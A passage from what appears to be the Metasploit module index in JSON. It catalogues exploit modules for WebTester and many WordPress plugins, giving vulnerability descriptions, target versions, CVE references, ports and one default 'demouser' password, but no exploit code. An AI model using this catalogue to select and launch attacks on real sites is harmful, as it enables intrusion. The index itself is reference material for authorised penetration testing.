"description": "This module exploits a command execution vulnerability in WebTester\n version 5.x. The 'install2.php' file allows unauthenticated users to\n execute arbitrary commands in the 'cpusername', 'cppassword' and\n 'cpdomain' parameters.",
"references": [
"OSVDB-98750",
"URL-https://sourceforge.net/p/webtesteronline/bugs/3/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WebTester version 5.x"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/webtester_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/webtester_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_admin_shell_upload": {
"name": "WordPress Admin Shell Upload",
"full_name": "exploit/unix/webapp/wp_admin_shell_upload",
"rank": 600,
"disclosure_date": "2015-02-21",
"type": "exploit",
"author": [
"rastating"
],
"description": "This module will generate a plugin, pack the payload into it\n and upload it to a server running WordPress providing valid\n admin credentials are used.",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WordPress"
],
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/exploits/unix/webapp/wp_admin_shell_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_admin_shell_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_advanced_custom_fields_exec": {
"name": "WordPress Plugin Advanced Custom Fields Remote File Inclusion",
"full_name": "exploit/unix/webapp/wp_advanced_custom_fields_exec",
"rank": 600,
"disclosure_date": "2012-11-14",
"type": "exploit",
"author": [
"Charlie Eriksen <charlie@ceriksen.com>"
],
"description": "This module exploits a remote file inclusion flaw in the WordPress blogging\n software plugin known as Advanced Custom Fields. The vulnerability allows for remote\n file inclusion and remote code execution via the export.php script. The Advanced\n Custom Fields plug-in versions 3.5.1 and below are vulnerable. This exploit only\n works when the php option allow_url_include is set to On (Default Off).",
"references": [
"OSVDB-87353",
"URL-http://secunia.com/advisories/51037/",
"WPVDB-6103"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_advanced_custom_fields_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_ajax_load_more_file_upload": {
"name": "Wordpress Ajax Load More PHP Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_ajax_load_more_file_upload",
"rank": 600,
"disclosure_date": "2015-10-10",
"type": "exploit",
"author": [
"Unknown",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an arbitrary file upload in the WordPress Ajax Load More\n version 2.8.1.1. It allows uploading arbitrary PHP files and obtaining remote code\n execution. This module has been tested successfully on WordPress Ajax Load More\n 2.8.0 with WordPress 4.1.3 on Ubuntu 12.04/14.04 Server.",
"references": [
"WPVDB-8209"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Ajax Load More 2.8.1.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_ajax_load_more_file_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_asset_manager_upload_exec": {
"name": "WordPress Asset-Manager PHP File Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_asset_manager_upload_exec",
"rank": 600,
"disclosure_date": "2012-05-26",
"type": "exploit",
"author": [
"Sammy FORGIT",
"James Fitts <fitts.james@gmail.com>"
],
"description": "This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress\n plugin. By abusing the upload.php file, a malicious user can upload a file to a\n temp directory without authentication, which results in arbitrary code execution.",
"references": [
"OSVDB-82653",
"BID-53809",
"EDB-18993",
"URL-http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html",
"WPVDB-6106"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"asset-manager <= 2.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_asset_manager_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_creativecontactform_file_upload": {
"name": "Wordpress Creative Contact Form Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_creativecontactform_file_upload",
"rank": 600,
"disclosure_date": "2014-10-22",
"type": "exploit",
"author": [
"Gianni Angelozzi",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an arbitrary PHP code upload in the WordPress Creative Contact\n Form version 0.9.7. The vulnerability allows for arbitrary file upload and remote code execution.",
"references": [
"EDB-35057",
"OSVDB-113669",
"WPVDB-7652"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Creative Contact Form 0.9.7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_creativecontactform_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_downloadmanager_upload": {
"name": "Wordpress Download Manager (download-manager) Unauthenticated File Upload",
"full_name": "exploit/unix/webapp/wp_downloadmanager_upload",
"rank": 600,
"disclosure_date": "2014-12-03",
"type": "exploit",
"author": [
"Mickael Nadeau",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "The WordPress download-manager plugin contains multiple unauthenticated file upload\n vulnerabilities which were fixed in version 2.7.5.",
"references": [
"URL-http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html",
"WPVDB-7706"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"download-manager < 2.7.5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_downloadmanager_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_easycart_unrestricted_file_upload": {
"name": "WordPress WP EasyCart Unrestricted File Upload",
"full_name": "exploit/unix/webapp/wp_easycart_unrestricted_file_upload",
"rank": 600,
"disclosure_date": "2015-01-08",
"type": "exploit",
"author": [
"Kacper Szurek",
"rastating"
],
"description": "WordPress Shopping Cart (WP EasyCart) Plugin for\n WordPress contains a flaw that allows a remote\n attacker to execute arbitrary PHP code. This\n flaw exists because the\n /inc/amfphp/administration/banneruploaderscript.php\n script does not properly verify or sanitize\n user-uploaded files. By uploading a .php file,\n the remote system will place the file in a\n user-accessible path. Making a direct request to\n the uploaded file will allow the attacker to\n execute the script with the privileges of the web\n server.\n\n In versions <= 3.0.8 authentication can be done by\n using the WordPress credentials of a user with any\n role. In later versions, a valid EasyCart admin\n password belonging to any admin user is required.\n A default installation of EasyCart will\n set up a user called \"demouser\" with a preset password\n of \"demouser\".",
"references": [
"CVE-2014-9308",
"OSVDB-116806",
"WPVDB-7745"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"wp-easycart"
],
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_easycart_unrestricted_file_upload",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_foxypress_upload": {
"name": "WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution",
"full_name": "exploit/unix/webapp/wp_foxypress_upload",
"rank": 600,
"disclosure_date": "2012-06-05",
"type": "exploit",
"author": [
"Sammy FORGIT",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits an arbitrary PHP code execution flaw in the WordPress\n blogging software plugin known as Foxypress. The vulnerability allows for arbitrary\n file upload and remote code execution via the uploadify.php script. The Foxypress\n plugin versions 0.4.1.1 to 0.4.2.1 are vulnerable.",
"references": [
"EDB-18991",
"BID-53805",
"WPVDB-6231"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Foxypress 0.4.1.1 - 0.4.2.1"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/webapp/wp_foxypress_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_foxypress_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_frontend_editor_file_upload": {
"name": "Wordpress Front-end Editor File Upload",
"full_name": "exploit/unix/webapp/wp_frontend_editor_file_upload",
"rank": 600,
"disclosure_date": "2012-07-04",
"type": "exploit",
"author": [
"Sammy",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "The WordPress Front-end Editor plugin contains an authenticated file upload\n vulnerability. An attacker can upload arbitrary files to the upload folder because\n the plugin uses its own file upload mechanism instead of the WordPress API, which\n incorrectly allows uploads of any file type.",
"references": [
"OSVDB-83637",
"WPVDB-7569",
"URL-http://www.opensyscom.fr/Actualites/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Front-End Editor 2.2.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_frontend_editor_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_google_document_embedder_exec": {
"name": "WordPress Plugin Google Document Embedder Arbitrary File Disclosure",
"full_name": "exploit/unix/webapp/wp_google_document_embedder_exec",
"rank": 300,
"disclosure_date": "2013-01-03",
"type": "exploit",
"author": [
"Charlie Eriksen"
],
"description": "This module exploits an arbitrary file disclosure flaw in the WordPress\n blogging software plugin known as Google Document Embedder. The vulnerability allows for\n database credential disclosure via the /libs/pdf.php script. The Google Document Embedder\n plug-in versions 2.4.6 and below are vulnerable. This exploit only works when the MySQL\n server is exposed on an accessible IP and WordPress has filesystem write access.\n\n Please note: The admin password may get changed if the exploit does not run to the end.",
"references": [
"CVE-2012-4915",
"OSVDB-88891",
"URL-http://secunia.com/advisories/50832",
"WPVDB-6073"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-08 10:04:47 +0000",
"path": "/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_google_document_embedder_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_holding_pattern_file_upload": {
"name": "WordPress Holding Pattern Theme Arbitrary File Upload",
"full_name": "exploit/unix/webapp/wp_holding_pattern_file_upload",
"rank": 600,
"disclosure_date": "2015-02-11",
"type": "exploit",
"author": [
"Alexander Borg",
"rastating"
],
"description": "This module exploits a file upload vulnerability in all versions of the\n Holding Pattern theme found in the upload_file.php script which contains\n no session or file validation. It allows unauthenticated users to upload\n files of any type and subsequently execute PHP scripts in the context of\n the web server.",
"references": [
"CVE-2015-1172",
"WPVDB-7784",
"PACKETSTORM-130282"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"holding_pattern"
],
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_holding_pattern_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_inboundio_marketing_file_upload": {
"name": "Wordpress InBoundio Marketing PHP Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_inboundio_marketing_file_upload",
"rank": 600,
"disclosure_date": "2015-03-24",
"type": "exploit",
"author": [
"KedAns-Dz",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an arbitrary file upload in the WordPress InBoundio Marketing version\n 2.0. It allows uploading arbitrary PHP files to obtain remote code execution. This module\n has been tested successfully on WordPress InBoundio Marketing 2.0.3 with Wordpress 4.1.3 on\n Ubuntu 14.04 Server.",
"references": [
"EDB-36478",
"OSVDB-119890",
"WPVDB-7864"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"InBoundio Marketing 2.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_inboundio_marketing_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_infusionsoft_upload": {
"name": "Wordpress InfusionSoft Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_infusionsoft_upload",
"rank": 600,
"disclosure_date": "2014-09-25",
"type": "exploit",
"author": [
"g0blin",
"us3r777 <us3r777@n0b0.so>"
],
"description": "This module exploits an arbitrary PHP code upload in the WordPress Infusionsoft Gravity\n Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file\n upload and remote code execution.",
"references": [
"CVE-2014-6446",
"URL-http://research.g0blin.co.uk/cve-2014-6446/",
"WPVDB-7634"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Infusionsoft 1.5.3 - 1.5.10"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_infusionsoft_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_lastpost_exec": {
"name": "WordPress cache_lastpostdate Arbitrary Code Execution",
"full_name": "exploit/unix/webapp/wp_lastpost_exec",
"rank": 600,
"disclosure_date": "2005-08-09",
"type": "exploit",
"author": [
"str0ke <str0ke@milw0rm.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits an arbitrary PHP code execution flaw in the WordPress\n blogging software. This vulnerability is only present when the PHP 'register_globals'\n option is enabled (common for hosting providers). All versions of WordPress prior to\n 1.5.1.3 are affected.",
"references": [
"CVE-2005-2612",
"OSVDB-18672",
"BID-14533",
"WPVDB-6034"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_lastpost_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_lastpost_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_mobile_detector_upload_execute": {
"name": "WordPress WP Mobile Detector 3.5 Shell Upload",
"full_name": "exploit/unix/webapp/wp_mobile_detector_upload_execute",
"rank": 600,
"disclosure_date": "2016-05-31",
"type": "exploit",
"author": [
"pluginvulnerabilities.com",
"Aaditya Purani",
"h00die"
],
"description": "WP Mobile Detector Plugin for WordPress contains a flaw that allows a remote attacker\n to execute arbitrary PHP code. This flaw exists because the\n /wp-content/plugins/wp-mobile-detector/resize.php script contains a\n remote file include for files not already cached by the system.\n By uploading a .php file, the remote system will\n place the file in a user-accessible path. Making a direct request to the\n uploaded file will allow the attacker to execute the script with the privileges\n of the web server.",
"references": [
"WPVDB-8505",
"EDB-39891",
"URL-https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"wp-mobile-detectory < 3.6"
],
"mod_time": "2017-11-01 13:32:00 +0000",
"path": "/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_mobile_detector_upload_execute",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_nmediawebsite_file_upload": {
"name": "Wordpress N-Media Website Contact Form Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_nmediawebsite_file_upload",
"rank": 600,
"disclosure_date": "2015-04-12",
"type": "exploit",
"author": [
"Claudio Viviani",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form\n plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution.",
"references": [
"URL-http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/",
"WPVDB-7896"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"N-Media WebSite Contact Form 1.3.4"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_nmediawebsite_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_optimizepress_upload": {
"name": "WordPress OptimizePress Theme File Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_optimizepress_upload",
"rank": 600,
"disclosure_date": "2013-11-29",
"type": "exploit",
"author": [
"United of Muslim Cyber Army",
"Mekanismen"
],
"description": "This module exploits a vulnerability found in the WordPress theme OptimizePress. The\n vulnerability is due to an insecure file upload on the media-upload.php component, allowing\n an attacker to upload arbitrary PHP code. This module has been tested successfully on\n OptimizePress 1.45.",
"references": [
"CVE-2013-7102",
"URL-http://www.osirt.com/2013/11/wordpress-optimizepress-hack-file-upload-vulnerability/",
"WPVDB-7441"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"OptimizePress"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/unix/webapp/wp_optimizepress_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_optimizepress_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_photo_gallery_unrestricted_file_upload": {
"name": "WordPress Photo Gallery Unrestricted File Upload",
"full_name": "exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload",
"rank": 600,
"disclosure_date": "2014-11-11",
"type": "exploit",
"author": [
"Kacper Szurek",
"rastating"
],
"description": "Photo Gallery Plugin for WordPress contains a flaw that allows a\n remote attacker to execute arbitrary PHP code. This flaw exists\n because the photo-gallery\\photo-gallery.php script allows access\n to filemanager\\UploadHandler.php. The post() method in UploadHandler.php\n does not properly verify or sanitize user-uploaded files.\n\n This module was tested on version 1.2.5.",
"references": [
"OSVDB-117676",
"WPVDB-7769",
"CVE-2014-9312",
"URL-http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"photo-gallery < 1.2.6"
],
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_photo_gallery_unrestricted_file_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_phpmailer_host_header": {
"name": "WordPress PHPMailer Host Header Command Injection",
"full_name": "exploit/unix/webapp/wp_phpmailer_host_header",
"rank": 200,
"disclosure_date": "2017-05-03",
"type": "exploit",
"author": [
"Dawid Golunski",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability in WordPress\n version 4.6 with Exim as an MTA via a spoofed Host header to PHPMailer,\n a mail-sending library that is bundled with WordPress.\n\n A valid WordPress username is required to exploit the vulnerability.\n Additionally, due to the altered Host header, exploitation is limited to\n the default virtual host, assuming the header isn't mangled in transit.\n\n If the target is running Apache 2.2.32 or 2.4.24 and later, the server\n may have HttpProtocolOptions set to Strict, preventing a Host header\n containing parens from passing through, making exploitation unlikely.",
"references": [
"CVE-2016-10033",
"URL-https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html",
"URL-http://www.exim.org/exim-html-current/doc/html/spec_html/ch-string_expansions.html",
"URL-https://httpd.apache.org/docs/2.4/mod/core.html#httpprotocoloptions"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WordPress 4.6 / Exim"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_phpmailer_host_header",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/wp_pixabay_images_upload": {
"name": "WordPress Pixabay Images PHP Code Upload",
"full_name": "exploit/unix/webapp/wp_pixabay_images_upload",
"rank": 600,
"disclosure_date": "2015-01-19",
"type": "exploit",
"author": [
"h0ng10"
],
"description": "This module exploits multiple vulnerabilities in the WordPress plugin Pixabay\n Images 2.3.6. The plugin does not check the host of a provided download URL\n which can be used to store and execute malicious PHP code on the system.",
"references": [
"CVE-2015-1376",
"URL-https://www.mogwaisecurity.de/advisories/MSA-2015-01.txt",
"OSVDB-117145",
"OSVDB-117146",
"WPVDB-7758"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"pixabay-images 2.3"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_pixabay_images_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_platform_exec": {
"name": "WordPress Platform Theme File Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_platform_exec",
"rank": 600,
"disclosure_date": "2015-01-21",
"type": "exploit",
"author": [
"Marc-Alexandre Montpas",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "The WordPress Theme \"platform\" contains a remote code execution vulnerability\n through an unchecked admin_init call. The theme includes the uploaded file\n from its temp filename with PHP's include function.",
"references": [
"URL-http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html",
"WPVDB-7762"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"platform < 1.4.4, platform pro < 1.6.2"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/wp_platform_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_platform_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_property_upload_exec": {
"name": "WordPress WP-Property PHP File Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_property_upload_exec",
"rank": 600,
"disclosure_date": "2012-03-26",
"type": "exploit",
"author": [
"Sammy FORGIT",
"James Fitts <fitts.james@gmail.com>"
],
"description": "This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress\n plugin. By abusing the uploadify.php file, a malicious user can upload a file to a\n temp directory without authentication, which results in arbitrary code execution.",
"references": [
"OSVDB-82656",
"BID-53787",
"EDB-18987",
"URL-http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html",
"WPVDB-6225"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"wp-property <= 1.35.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_property_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_property_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_reflexgallery_file_upload": {
"name": "Wordpress Reflex Gallery Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_reflexgallery_file_upload",
"rank": 600,
"disclosure_date": "2012-12-30",
"type": "exploit",
"author": [
"Unknown",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery\n version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.",
"references": [
"CVE-2015-4133",
"EDB-36374",
"OSVDB-88853",
"WPVDB-7867"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Reflex Gallery 3.1.3"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_reflexgallery_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_revslider_upload_execute": {
"name": "WordPress RevSlider File Upload and Execute Vulnerability",
"full_name": "exploit/unix/webapp/wp_revslider_upload_execute",
"rank": 600,
"disclosure_date": "2014-11-26",
"type": "exploit",
"author": [
"Simo Ben youssef",
"Tom Sellers <tom@fadedcode.net>"
],
"description": "This module exploits an arbitrary PHP code upload vulnerability in the\n WordPress ThemePunch Slider Revolution (RevSlider) plugin, versions 3.0.95\n and prior. The vulnerability allows for arbitrary file upload and remote code execution.",
"references": [
"CVE-2014-9735",
"OSVDB-115118",
"EDB-35385",
"WPVDB-7954",
"URL-https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ThemePunch Revolution Slider (revslider) 3.0.95"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_revslider_upload_execute",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_slideshowgallery_upload": {
"name": "Wordpress SlideShow Gallery Authenticated File Upload",
"full_name": "exploit/unix/webapp/wp_slideshowgallery_upload",
"rank": 600,
"disclosure_date": "2014-08-28",
"type": "exploit",
"author": [
"Jesus Ramirez Pichardo",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "The Wordpress SlideShow Gallery plugin contains an authenticated file upload\n vulnerability. An attacker can upload arbitrary files to the upload folder.\n Since the plugin uses its own file upload mechanism instead of the WordPress\n API, it's possible to upload any file type.",
"references": [
"CVE-2014-5460",
"EDB-34681",
"WPVDB-7532"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
